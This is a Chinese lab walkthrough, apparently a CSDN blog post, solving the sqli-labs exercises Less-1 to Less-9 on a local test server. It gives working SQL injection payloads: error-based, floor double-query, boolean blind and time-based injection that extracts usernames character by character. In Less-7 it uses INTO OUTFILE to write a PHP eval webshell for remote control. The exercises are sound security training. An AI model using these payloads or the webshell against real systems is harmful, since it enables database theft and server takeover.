Sqli 注入点解析

目录

Less-1: 字符型注入

Less-2: 数字型注入

Less-3: 单引号字符型+括号

Less-4: 双引号字符型+括号

Less-5: 单引号字符型+固定输出信息 (floor报错注入&盲注)

Less-6: 双引号字符型+固定输出信息

Less-7: 写入文件

Less-8: Boolean型盲注

Less-9: 延时注入


先附上sqli的源代码:链接: https://pan.baidu.com/s/1d2rZVg5hz0ZBv2yg-UoArw 密码: 5w9y

我是在本地用phpstudy搭的一个环境。

Less-1: 字符型注入

输入  http://127.0.0.1/sqli/Less-1/?id=1'

发生了报错,可以知道存在注入,通过报错信息,我们可以猜到sql查询的源代码

select*from security where id=' $_GET[id] ' limit 0 ,1

我们找到了注入点之后就可以进行注入了,union注入,盲注等等都可以。

http://127.0.0.1/sqli/Less-1/?id=1' and 1=2 #

//  and 1=2 就是注入点,我们就可以用工具进行注入了
http://127.0.0.1/sqli/Less-1/?id=1' #inject# #

Less-2: 数字型注入

我们发现输入1 and 1=1 和 1 and 1=2 页面不一样,所以页面存在注入漏洞

http://127.0.0.1/sqli/Less-2/?id=1 and 1=1
http://127.0.0.1/sqli/Less-2/?id=1 and 1=2

在后来的注入过程中,发现语句后面还有 limit 0 ,1 。所以可以猜到sql查询的源代码

select * from security where id=$_GET[id] limit 0,1

我们找到了注入点之后就可以进行注入了,union注入,盲注等等都可以。

http://127.0.0.1/sqli/Less-2/?id=1 and 1=2 #

// and 1=2 就是注入点,我们就可以利用工具进行注入了
http://127.0.0.1/sqli/Less-2/?id=1 #inject# #

Less-3: 单引号字符型+括号

我们输入 http://127.0.0.1/sqli/Less-3/?id=3'  出现了报错。

所以存在注入,从报错信息我们可以猜到sql查询源代码

select * from security where id=('$_GET[id]') limit 0,1

我们找到了注入点之后就可以进行注入了,union注入,盲注等等都可以。

http://127.0.0.1/sqli/Less-3/?id=3') and 1=2 #

// and 1=2 就是注入点,我们就可以利用工具注入了
http://127.0.0.1/sqli/Less-3/?id=3') #inject# #

Less-4: 双引号字符型+括号

我们输入 http://127.0.0.1/sqli/Less-4/?id=1' 发现页面没有发生报错,猜想,可能是过滤了 ' 。

接着,我们再输入 http://127.0.0.1/sqli/Less-4/?id=1" ,页面报错,知道存在SQL注入。

从报错信息中我们可以猜到其sql查询源代码

select * from security where id=(" $_GET[id] ") limit 0,1

我们找到了注入点之后就可以进行注入了,union注入,盲注等等都可以。

http://127.0.0.1/sqli/Less-4/?id=1") and 1=2 #

// and 1=2 就是注入点,我们就可以利用工具进行注入了
http://127.0.0.1/sqli/Less-4/?id=1") #inject# #

Less-5: 单引号字符型+固定输出信息 (floor报错注入&盲注)

输入 http://127.0.0.1/sqli/Less-5/?id=1'  发现页面报错。

所以存在SQL注入,可以猜到sql查询的源代码。

select * from security where id='$_GET[id]' limit 0,1

咦,这不是和Less-1是一样的吗?哦不,页面显示的信息有点不一样!最后我们发现无论输入什么正确的信息,页面都只显示 You are in .....

于是我们猜测,页面的输出信息是固定的。当sql查询语句正确时,就返回一个固定的信息。当sql查询语句错误时,就不显示。当sql语句有错时,页面就会报出sql语句的错!为了验证这个,我们看下源代码。果然,证实了我们的猜想!

那么,这种情况下我们怎么进行注入呢?

这种情况union注入是行不通的。因为我们只能通过order by知道有3列,而不知道多少列是显示列。

那盲注呢,我们可以通过页面是否显示来判断我们的输入是否正确,当我们的sql正确时,就显示you are in....。当我们的sql语句错误是,就不显示。

我们找到了注入点之后就可以进行盲注了!

http://127.0.0.1/sqli/Less-1/?id=1' and 1=2 #
// and 1=2 就是注入点,我们就可以在注入点的位置插入判断语句了
http://127.0.0.1/sqli/Less-1/?id=1' #inject# #

这题,我们网上的另一个好的解法就是利用双注入!双注入其实也就是floor报错注入。是利用count(),rand(),floor(),group by这几个函数结合在一起发生的漏洞,缺一不可!

双查询注入就是两个嵌套的查询,即 select  ....(select .....) ,里面的那个select被称为子查询,外面的那个select叫做父查询。执行顺序是先执行子查询,然后执行父查询。

下面是payload

// 我们可以将 user() 改成任何函数,以获取我们想要的信息
http://127.0.0.1/sqli/Less-1/?id=1'  and (select 1 from (select count(*) from information_schema.tables group by concat(user(),floor(rand(0)*2)))a) #

//将其分解
(select 1 from (Y)a)

Y= select count(*) from information_schema.tables group by concat(Z)

Z= user(),floor(rand(0)*2)

Less-6: 双引号字符型+固定输出信息

输入  http://127.0.0.1/sqli/Less-6/?id=1" 页面发生了报错

所以存在SQL注入,可以猜到sql查询的源代码。

select * from security where id="$_GET[id]" limit 0,1

可以利用 1"# 进行绕过,后来发现和Less-5一样,页面输出固定的信息。所以我们可以利用Less-5相同的解法,只不过把Less-5里面绕过的  '  换成 " 即可!

Less-7: 单引号+双括号

输入 1'  页面报错,但是没有提示出错原因,只是说有错误,很明显,是程序员把错误都给统一处理为You have an error in your SQL syntax 了。

于是猜测可能是字符型的,所以输入 1'# ,页面报错!心想,可能过滤了#,于是换成 1'--+ ,发现还是报错了,有可能把注释符都给过滤了吧!于是我们再输入 1' and '1'='2 看看页面的显示,如果页面不正常显示,说明就是字符型的注入了,只不过是把注释符都给过滤了。可是,页面显示正常!! 这就奇怪了,于是我偷偷的看了下源码,发现,参数用两个括号和单引号保护住了!

于是,我们可以这样构造payload

http://127.0.0.1/sqli/Less-7/?id=1')) and 1=2#

发现页面还是显示报错!

于是,我们继续看了下源代码!发现只有当我们的sql查询语句能查询到数据的时候,就返回固定的 You are in ... Use outfile......,当我们的sql查询语句错误或者返回的是空数据的时候,就返回固定的 You have an error in your SQL stntax。

那样的话,我们构造的payload就查询不到任何数据了。那么,这种情况下我们该如何解呢?我们看到当我们的sql语句能查询到数据的时候他的提示信息,  Use outfile ! 是不是要利用 outfile 这个函数呢?outfile 这个函数的用法是 select  A into outfile B 。意思就是将A写入B中,A可以是任意的文本内容,也可以是数据库查询到的数据,B是一个绝对路径的文件!

于是,我们可以构造这样的payload

// 意思就是读取表users的数据,写入到e盘的4.txt文件中
http://127.0.0.1/sqli/Less-7/?id=1')) union select * from users into outfile "e:\4.txt" #

// 我们可以将一句话木马写入,然后用菜刀连接,获得shell
http://127.0.0.1/sqli/Less-7/?id=1')) union select 1,('<?php  @eval($_POST[aa]) ?>'),3  into outfile "e:\5.txt" #

Less-8: Boolean型盲注

直接看源代码吧!

通过源代码我们知道,吧参数当成字符型处理。当sql查询语句正确的时候,返回You are in..... 当sql语句错误或没查询到任何数据时,不显示任何东西!所以,我们可以利用boolean行盲注来判断,根据页面是否显示数据来判断我们的sql语句是否正确!

boolean盲注就是利用 substring() ,ascii() ,length() 这几个函数,结合二分法来判断数据的!手工boolean盲注很麻烦,可以利用工具来进行盲注!下面给出盲注的基本代码

http://127.0.0.1/sqli/Less-1/?id=1' and 1=2 #

//  and 1=2 就是注入点,我们就可以用工具进行注入了
http://127.0.0.1/sqli/Less-1/?id=1' #inject# #

// 判断username列的第一个数据长度,第二个数据 limit 2,1  ,第三个数据 limit 3,1
http://127.0.0.1/sqli/Less-1/?id=-1'  and (select length(username) from admin  limit 1) >5 #

// 判断username列的第一个数据的第一个字符的ascii值
http://127.0.0.1/sqli/Less-1/?id=-1'  and (select ascii(username) from admin limit 1)>97 #

// 判断username列的第一个数据的第2个字符的ascii值
http://127.0.0.1/sqli/Less-1/?id=-1'  and (select ascii(substring(username,2,1)) from admin limit 1)>97 #

// 判断username列的第二个数据的第2个字符的ascii值
http://127.0.0.1/sqli/Less-1/?id=-1'  and (select ascii(substring(username,2,1)) from admin limit 2,1)>97 #

Less-9: 延时注入

直接看源代码

从源代码中我们知道,把参数当成了字符来处理。无论我们的查询语句是否正确,都返回固定的一个信息: You are in ...........

所以,这种情况下我们可以利用延时注入,根据页面的响应时间来判断我们的输入是否正确!延时注入主要是利用 if(条件,true时执行,false时执行) 函数。延时注入比boolean盲注更加的耗费时间,因为我们要时间等待页面的响应。所以,我们进行延时注入也一般是利用工具来注入!下面的延时注入的基本思路的代码

// 判断当前数据库的第一个字符的ascii是否大于100,如果大于100,页面立马响应,否则3秒后响应
http://127.0.0.1/sqli/Less-9/?id=1' and if (ascii(substr(database(),1,1))>100,1,sleep(3))#

 

已标记关键词 清除标记
©️2020 CSDN 皮肤主题: Age of Ai 设计师:meimeiellie 返回首页
实付 19.90元
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值